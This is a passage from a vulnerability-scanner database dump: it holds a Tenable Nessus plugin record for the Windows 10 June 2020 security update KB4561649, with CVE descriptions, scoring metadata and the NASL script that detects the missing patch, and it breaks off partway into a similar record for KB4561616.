not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561649: Windows 10 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1216", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1197"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561649.NASL", "href": "https://www.tenable.com/plugins/nessus/137261", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137261);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1234\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1278\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561649\");\n script_xref(name:\"MSFT\", value:\"MS20-4561649\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n\n script_name(english:\"KB4561649: Windows 10 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561649.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1304,\n CVE-2020-1334)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1278)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\");\n # https://support.microsoft.com/en-us/help/4561649/windows-10-update-kb4561649\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?111cb6a4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561649.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561649'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561649])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T09:55:09", "description": "The remote Windows host is missing security update 4561616.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1235, CVE-2020-1282,\n CVE-2020-1304, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n 